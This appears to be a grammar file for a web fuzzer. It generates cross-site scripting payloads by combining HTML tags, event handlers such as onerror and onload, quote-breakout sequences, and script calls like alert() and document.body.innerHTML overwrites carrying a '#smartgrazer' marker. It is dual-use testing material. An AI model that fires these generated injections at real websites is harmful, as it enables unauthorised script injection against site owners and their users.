%section% := value

payload :=
	[+attack+]
	[+outbreak+,+attack+]

attack :=
	+attacks_js+
	+attacks_html+

attacks_js :=
	+space+,+event+,=,+quote+,+payload_attack+,+quote+,+bracket_gt+
	+bracket_lt+,+tag_js+,+bracket_gt+,+space+,+payload_attack+,+bracket_lt+,/,+tag_js+,+bracket_gt+
	
attacks_html :=
	+bracket_lt+,+tag_html+,+space+,+event+,=,+payload_attack+,+bracket_gt+
	+bracket_lt+,img,+space+,src,=,0,+space+,onerror,=,+payload_attack+,+space+,/,+bracket_gt+
	+bracket_lt+,+tag_html+,+bracket_gt+,+quote+,+space+,+event+,+space+,+quote+,+payload_attack+,+bracket_lt+,+tag_html+,+bracket_gt+

outbreak := 
	+quote+,+bracket_gt+
	+bracket_lt+,/,+tag_html+,+bracket_gt+
	+outbreak+,+bracket_lt+,/,+tag_html+,+bracket_gt+

tag_html :=
	a
	abbr
	acronym
	address
	applet
	area
	article
	aside
	audio
	b
	base
	basefont
	bdi
	bdo
	big
	blockquote
	body
	br
	button
	canvas
	caption
	center
	cite
	code
	col
	colgroup
	datalist
	dd
	del
	details
	dfn
	dialog
	dir
	div
	dl
	dt
	em
	embed
	fieldset
	figcaption
	figure
	font
	footer
	form
	frame
	frameset
	h1
	head
	header
	hr
	html
	i
	iframe
	img
	input
	ins
	kbd
	keygen
	label
	legend
	li
	link
	main
	map
	mark
	menu
	menuitem
	meta
	meter
	nav
	noframes
	object
	ol
	optgroup
	option
	output
	p
	param
	picture
	pre
	progress
	q
	rp
	rt
	ruby
	s
	samp
	script
	section
	select
	small
	source
	span
	strike
	strong
	style
	sub
	summary
	sup
	table
	tbody
	td
	textarea
	tfoot
	th
	thead
	time
	title
	tr
	track
	tt
	u
	ul
	var
	video
	wbr

tag_js :=
	script

event :=
	onclick
	oncontextmenu
	ondblclick
	onmousedown
	onmouseenter
	onmouseleave
	onmousemove
	onmouseover
	onmouseout
	onmouseup
	onkeydown
	onkeypress
	onkeyup
	onabort
	onbeforeunload
	onerror
	onhashchange
	onload
	onpageshow
	onpagehide
	onresize
	onscroll
	onunload
	onblur
	onchange
	onfocus
	onfocusin
	onfocusout
	oninput
	oninvalid
	onreset
	onsearch
	onselect
	onsubmit
	ondrag
	ondragend
	ondragenter
	ondragleave
	ondragover
	ondragstart
	ondrop
	oncopy
	oncut
	onpaste
	onafterprint
	onbeforeprint
	onabort
	oncanplay
	oncanplaythrough
	ondurationchange
	onemptied
	onended
	onerror
	onloadeddata
	onloadedmetadata
	onloadstart
	onpause
	onplay
	onplaying
	onprogress
	onratechange
	onseeked
	onseeking
	onstalled
	onsuspend
	ontimeupdate
	onvolumechange
	onwaiting
	animationend
	animationiteration
	animationstart
	transitionend
	onerror
	onmessage
	onopen
	onmessage
	onmousewheel
	ononline
	onoffline
	onpopstate
	onshow
	onstorage
	ontoggle
	onwheel
	ontouchcancel
	ontouchend
	ontouchmove
	ontouchstart
	
	
bracket_gt :=
	62
	
bracket_lt :=
	60
	
payload_attack :=
	document.body.innerHTML,=,\,+quote+,+payload_text+,\,+quote+
	alert,(,+quote+,+payload_text+,+quote+,)
	promt,(,+quote+,+payload_text+,+quote+,)
	confirm,(,+quote+,+payload_text+,+quote+,)
	
payload_text :=
	#smartgrazer
	#smartgrazer+random_text+
	
	
quote :=
	&nbsp;
	34
	39
	96
	
space :=
	7
	9
	10
	11
	12
	32
	43
	47
	
random_text :=
	%range%(a-z)
	%range%(A-Z)
	%range%(0-9)
	%range%(a-z)+random_text+
	%range%(A-Z)+random_text+
	%range%(0-9)+random_text+
	
%section% := variance

main :=
	+payload+